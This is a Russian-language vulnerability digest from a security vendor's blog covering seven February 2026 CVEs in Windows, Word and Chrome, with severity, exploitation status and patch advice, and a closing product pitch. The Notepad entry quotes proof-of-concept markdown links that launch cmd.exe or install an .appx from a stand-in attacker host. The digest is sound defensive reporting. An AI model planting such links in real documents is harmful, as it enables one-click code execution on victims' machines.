Хабр, привет!
На связи команда инженеров-аналитиков R-Vision. В феврале мы отобрали 17 потенциально трендовых уязвимостей, из которых 11 получили подтверждённый статус. В этот дайджест мы включили только те из них, которые представляют наибольший практический интерес для специалистов по информационной безопасности — с учётом уровня риска, фактов подтверждённой эксплуатации и потенциального влияния на инфраструктуру.
Полный перечень уязвимостей доступен в Базе уязвимостей RVD (R-Vision Vulnerability Database), которая используется в продукте R-Vision VM.
В этот дайджест вошли следующие уязвимости:
CVE‑2026‑21519 - Microsoft Desktop Window Manager
CVE‑2026‑21513 - Microsoft MSHTML
СVE-2026-21510 - Microsoft Windows Shell
CVE‑2026‑21533 - Microsoft Remote Desktop Services
СVE-2026-20841 - Microsoft Windows Notepad
СVE-2026-21514 - Microsoft Word
CVE-2026-2441 - Google Chrome
CVE‑2026‑21519 | BDU:2026-01702: Уязвимость повышения привилегий в Desktop Window Manager (DWM)
Уровень критичности по оценке CVSS: 7.8
Вектор атаки: локальный
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Из-за ошибки type confusion процесс Desktop Window Manager (DWM) может интерпретировать объект памяти как объект ��ругого типа. На практике это означает, что локальный пользователь с низкими привилегиями может передать в DWM специально подготовленные данные, которые система ошибочно воспримет как легитимный внутренний объект системы. В результате такой подмены злоумышленник получает возможность изменять служебные данные процесса DWM и выполнять код с привилегиями SYSTEM.
Статус эксплуатации уязвимости:
Агентство по кибербезопасности и безопасности инфраструктуры США (CISA) в день выхода февральского Patch Tuesday добавило эту уязвимость в Каталог известных эксплуатируемых уязвимостей (KEV), отметив важность её исправления до 3 марта текущего года.
Возможные негативные сценарии:
Локальное повышение привилегий до уровня SYSTEM позволяет атакующему полностью скомпрометировать хост – установить бэкдоры, отключить средства защиты и получить доступ к конфиденциальным данным. В корпоративной среде это может привести к краже учётных данных и последующему горизонтальному перемещению по сети и компрометации критичных сервисов.
Рекомендации по устранению
Вендор 10 февраля 2026 года выпустил обновление безопасности, рекомендуется как можно скорее установить обновление на все затронутые версии Windows.
CVE‑2026‑21513 | BDU:2026-01700: Уязвимость обхода функции безопасности в Microsoft MSHTML
Уровень критичности по оценке CVSS: 8.8
Вектор атаки: сетевой
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Уязвимость, позволяющая атакующему обойти проверки Mark‑of‑the‑Web (специальная метка безопасности, добавляемая к файлам, загруженным из интернета). Проблема связана с некорректной проверкой входных данных в библиотеке ieframe.dll.
Функция обработки гиперссылок передаёт путь в вызов ShellExecuteExW без достаточной валидации. Исследователь из Akamai подтверждает, что эксплуатация уязвимости возможна при использовании сочетания вложенных iframe и файла ярлыка .lnk, в котором указан путь к HTML‑файлу. При открытии такого файла Windows Shell доверяет содержимому и выполняет его вне песочницы браузера. Для эксплуатации уязвимости необходимо убедить пользователя открыть вредоносный ярлык или HTML‑файл, распространяемый различными способами (например, через фишинговое письмо).
Статус эксплуатации уязвимости:
Microsoft отмечает, что уязвимость была публично раскры��а и активно эксплуатировалась еще до выхода патча.
Агентство CISA в день выхода февральского Patch Tuesday добавило эту уязвимость в KEV, отметив необходимость её устранения до 3 марта текущего года.
Возможные негативные сценарии:
Обход SmartScreen и запуск payload вне песочницы браузера позволяет выполнить команды с правами текущего пользователя и использовать уязвимость как первый этап дальнейшей цепочки атаки.
Рекомендации по устранению
10 февраля 2026 года вендор выпустил обновление безопасности. Рекомендуется как можно скорее установить обновление на все затронутые версии Windows.
СVE-2026-21510 | BDU:2026-01630: Уязвимость обхода функции безопасности в Windows Shell
Уровень критичности по оценке CVSS: 8.8
Вектор атаки: сетевой
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
При открытии файлов из интернета Windows обычно проверяет специальную метку Mark‑of‑the‑Web и выводит предупреждение SmartScreen, предлагая пользователю подтвердить запуск. Уязвимость заключается в том, что при обработке ярлыков (.lnk) и URL‑ссылок система некорректно определяет, откуда был получен файл. По данным Rapid7, злоумышленники используют технику "отмывания" Mark‑of‑the‑Web. Из вредоносного файла удаляется метка интернет-происхождения, после чего Windows воспринимает его как локальный и запускает без каких‑либо предупреждений. Для эксплуатации уязвимости атакующему достаточно отправить жертве специально сформированный ярлык или ссылку, например через фишинговое письмо, и убедить её перейти по нему.
Статус эксплуатации уязвимости:
Microsoft отмечает, что уязвимость была публично раскрыта и активно эксплуатировалась еще до выхода патча.
Агентство CISA в день выхода февральского Patch Tuesday добавило эту уязвимость в каталог KEV, отметив важность её исправления до 3 марта текущего года.
Возможные негативные сценарии:
В случае успешной эксплуатации атакующий может обойти защитные механизмы Windows (SmartScreen и Mark‑of‑the‑Web) и добиться выполнения произвольного кода с правами пользователя.
Рекомендации по устранению
10 февраля 2026 года вендор выпустил обновление безопасности. Рекомендуется как можно скорее установить обновление на все затронутые версии Windows.
CVE‑2026‑21533 | BDU:2026-01701: Уязвимость повышения привилегий в Remote Desktop Services (RDS)
Уровень критичности по оценке CVSS: 7.8
Вектор атаки: локальный
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Служба Remote Desktop Services (RDS) некорректно проверяет права пользователя при изменении своих параметров конфигурации. Это позволяет локальному пользователю с минимальными привилегиями изменить параметр запуска службы TermService и указать путь к вредоносному файлу вместо легитимного системного процесса.
При следующем запуске службы TermService или при перезагрузке системы этот файл будет выполнен с привилегиями SYSTEM, поскольку сама служба работает от имени этой учётной записи.
Статус эксплуатации уязвимости:
По данным CrowdStrike, уязвимость эксплуатировалась в атаках на организации как минимум с 24 декабря 2025 года. В ходе эксплуатации атакующие изменяли конфигурационный ключ службы RDS, что позволяло запускать вредоносный код с привилегиями SYSTEM и закрепляться в системе.
Агентство CISA в день выхода февральского Patch Tuesday добавило эту уязвимость в KEV, отметив важность её исправления до 3 марта текущего года.
Возможные негативные сценарии:
Локальное повышение привилегий до уровня SYSTEM позволяет атакующему полностью скомпрометировать хост – установить бэкдоры, отключить средства защиты и получить доступ к конфиденциальным данным. В корпоративной среде это может привести к краже учётных данных и последующему горизонтальному перемещению по сети и компрометации критичных сервисов.
Рекомендации по устранению
10 февраля 2026 года вендор выпустил обновление безопасности. Рекомендуется как можно скорее установить обновление на все затронутые версии Windows.
СVE-2026-20841| BDU:2026-01742: Уязвимость удаленного выполнения кода в приложении Windows Notepad
Уровень критичности по оценке CVSS: 7.8
Вектор атаки: локальный
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Уязвимости подвержена обновленная версия Notepad (Блокнот) на Windows 11, начиная с версии 11.2504.52.0, которая позволяет отображать и работать с разметкой Markdown. Злоумышленник может подготовить вредоносный документ, внедрив туда markdown гиперссылку, которая может вести на исполняемый файл в системе ([poc](file://C:/windows/system32/cmd.exe)), либо на скачивание и установку вредоносного ресурса ([poc](ms-appinstaller://?source=https://evil/xxx.appx)). Если пользователь перейдет по такой ссылке, то исполнение или установка файла произойдет автоматически, что приведёт к удаленному выполнению кода.
Необходимо отметить, что после исправления риск эксплуатации снижен, но не устранен полностью. В обновленной версии Notepad теперь при переходе по гиперссылке появляется диалоговое окно с текстом ссылки и предупреждением, что переход может быть небезопасным. При этом пользователь может проигнорировать предупреждение о переходе по ней. Злоумышленники по-прежнему с помощью приемов социальной инженерии или в случае невнимательности жертвы могут добиться удаленного выполнения кода в один клик.
Статус эксплуатации уязвимости:
В публичном доступе есть PoC эксплойтов. Подтвержденных эксплуатаций уязвимости на момент разбора не зафиксировано.
Возможные негативные сценарии:
В случае успешной эксплуатации атакующий может добиться удаленного выполнения кода и компрометации хоста.
Рекомендации по устранению
Обновите Notepad до версии 11.2510 или выше.
СVE-2026-21514 | BDU:2026-01699: Уязвимость обхода функции безопасности Microsoft Word
Уровень критичности по оценке CVSS: 7.8
Вектор атаки: локальный
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Обнаружена уязвимость в Microsoft Word, входящем в состав Microsoft Office LTSC 2021/2024 (для ОС Windows и macOS) и Microsoft 365 Apps for Enterprise.
Microsoft Word неправильно проверяет содержимое OLE‑объектов, считая вредоносный контент безопасным, что позволяет обойти защиту OLE/COM и выполнить вложенный код. Атакующий создаёт документ Word с вредоносным OLE‑кодом, отправляет его жертве и убеждает её открыть. После открытия Word запускает вложенный код с правами текущего пользователя, обходя встроенные механизмы защиты.
Стоит отметить, что просмотр документа в Preview Pane (режим предварительного просмотра) не приводит к запуску уязвимости, нужно открыть файл полностью.
Статус эксплуатации уязвимости:
Microsoft отмечает, что уязвимость была публично раскрыта и активно эксплуатировалась еще до выхода патча.
Агентство CISA в день выхода февральского Patch Tuesday добавило эту уязвимость в KEV, отметив важность исправления уязвимости до 3 марта текущего года.
Возможные негативные сценарии:
Выполнение произвольного кода с правами пользователя, открывшего вредоносный файл.
Использование полученного доступа для дальнейшего развития атаки и повышения привилегий в системе.
Рекомендации по устранению
Вендор 10 февраля 2026 года выпустил обновление безопасности, рекомендуется как можно скорее установить обновление для затронутых продуктов Microsoft.
CVE-2026-2441 | BDU:2026-01947: Выполнение произвольного кода внутри изолированной программной среды в Google Chrome
Уровень критичности по оценке CVSS: 8.8
Вектор атаки: сетевой
Подтверждение вендора:
Информация об эксплуатации
Описание уязвимости:
Выявлена критичная уязвимость в движке браузера Google Chrome, связанная с обработкой CSS-структур. Проблема возникает в компоненте CSSFontFeatureValuesMap, который отвечает за обработку CSS и работу с расширенными возможностями шрифтов
Для данной уязвимости характерна ошибка Use After Free. В обработке итераторов при изменении коллекции происходит обращение к уже освобождённой ячейке памяти, что создает возможность для выполнения вредоносного кода через специально сформированную страницу.
При определённых условиях злоумышленник может:
Инициировать освобождение объекта
Занять освобождённую область контролируемыми данными
Добиться чтения или записи по предсказуемому адресу
Важно отметить, что выполнение кода происходит в изолированном процессе браузера (sandbox), но эксплуатация данной уязвимости не гарантирует выхода из песочницы. Данная ошибка может использоваться как один из этапов в цепочке атаки.
Эксплуатация уязвимости возможна при посещении специально подготовленного веб-ресурса и может привести к выполнению произвольного кода в контексте процесса браузера. Дополнительного взаимодействия от пользователя не требуется.
Статус эксплуатации уязвимости:
Вендор подтвердил наличие эксплуатации в дикой природе до выпуска исправления. Публичные технические детали ограничены.
CISA в день выхода февральского Patch Tuesday добавила эту уязвимость в KEV, отметив важность исправления уязвимости до 10 марта текущего года.
Возможные негативные сценарии:
Выполнение произвольного кода в изолированной среде браузера
Загрузка и исполнение вредоносных модулей
Кража данных активной пользовательской сессии
Рекомендации по устранению
Обновите Chrome до версии ≥ 145.0.7632.75 (Windows/macOS) или ≥ 144.0.7559.75 (Linux).
Обновите браузеры на базе Chromium (Edge, Brave, Opera, Vivaldi, Яндекс.Браузер), как только станут доступны патчи от вендоров.
Как защититься?
В приоритете находится не только своевременное выявление уязвимостей, но и регулярный контроль состояния используемого ПО, сервисов и компонентов ИТ-инфраструктуры, а также их своевременное обновление.
Практика и результаты наших исследований показывают, что для организаций важно не просто фиксировать уязвимости, а иметь актуальное представление о состоянии инфраструктуры. Это позволяет корректно расставлять приоритеты и контролировать процесс их устранения. Для этого используются решения класса Vulnerability Management (например, R-Vision VM), обеспечивающие непрерывную работу с уязвимостями - от обнаружения до контроля устранения.
Процесс будет проще и быстрее, когда в такую систему встроен собственный сканер уязвимостей: не требуется интеграция с внешними решениями, данные о найденных уязвимостях сразу доступны в едином интерфейсе, а повторные проверки запускаются без дополнительных шагов.
Такой подход помогает не только своевременно реагировать на угрозы, но и выстраивать устойчивую, системную работу с уязвимостями, что становится все более актуальным на фоне регулярного появления новых критичных уязвимостей.
